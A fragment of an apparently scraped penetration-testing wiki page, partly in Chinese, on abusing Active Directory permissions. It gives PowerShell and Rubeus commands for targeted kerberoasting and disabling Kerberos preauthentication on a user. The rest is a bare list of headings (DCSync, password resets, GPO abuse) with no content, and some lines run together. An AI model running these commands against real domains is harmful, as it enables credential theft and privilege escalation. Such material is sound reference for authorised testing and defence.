Abusing Active Directory ACLs/ACEs
用户的GenericAll权限
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -VerboseSet-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}GenericAll Rights on Group
GenericAll / GenericWrite / Write on Computer/User
WriteProperty on Group
组中的自身(自我成员资格)
WriteProperty(自我成员资格)
ForceChangePassword
在组上使用WriteOwner
用户上的GenericWrite
组上的GenericWrite权限
WriteDACL + WriteOwner
域上的复制(DCSync)
GPO委派
GPO委派
枚举GPO权限
滥用GPO - New-GPOImmediateTask
GroupPolicy 模块 - 滥用 GPO
SharpGPOAbuse - 滥用 GPO
强制策略更新
内部机制
用户和组
参考资料
最后更新于